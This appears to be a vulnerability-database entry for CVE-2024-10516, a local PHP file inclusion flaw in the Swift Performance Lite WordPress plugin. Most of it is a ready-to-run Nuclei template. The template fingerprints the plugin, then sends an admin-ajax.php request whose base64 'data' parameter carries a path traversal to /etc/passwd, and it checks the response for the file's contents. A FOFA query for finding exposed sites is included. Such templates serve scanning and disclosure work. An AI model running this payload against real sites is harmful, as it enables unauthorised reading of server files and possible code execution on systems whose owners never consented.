漏洞描述
A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.
CVE-2024-10516: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion
PoC代码[已公开]
id: CVE-2024-10516
info:
name: Swift Performance Lite < 2.3.7.2 - Local PHP File Inclusion
author: ritikchaddha
severity: high
description: |
A vulnerability in Swift Performance Lite before version 2.3.7.2 allows unauthenticated attackers to perform local PHP file inclusion via the 'ajaxify' parameter. This can lead to arbitrary code execution on the server.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-10516
- https://nvd.nist.gov/vuln/detail/CVE-2024-10516
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10516
cwe-id: CWE-98
epss-score: 0.76557
epss-percentile: 0.98905
cpe: cpe:2.3:a:swiftperformance:swift_performance_lite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: swiftperformance
product: swift_performance_lite
fofa-query: body="/wp-content/plugins/swift-performance-lite"
tags: cve,cve2024,wp,wp-plugin,wordpress,swift-performance,lfi
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/2
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "/wp-content/plugins/swift-performance-lite"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=swift_performance_ajaxify&data=WyJ0ZW1wbGF0ZS1wYXJ0IiwibnVsbCIsIi4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2QiXQ==
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100ebc8dc7313ff5d86f742a01ed15512b15c90361267c854d797fbab52efb8d52b022071eb1e4cb90e8cf0a362bb361079a050e47fe556d2d50b2abc69d2caece73807:922c64590222798bb761d5b6d8e72950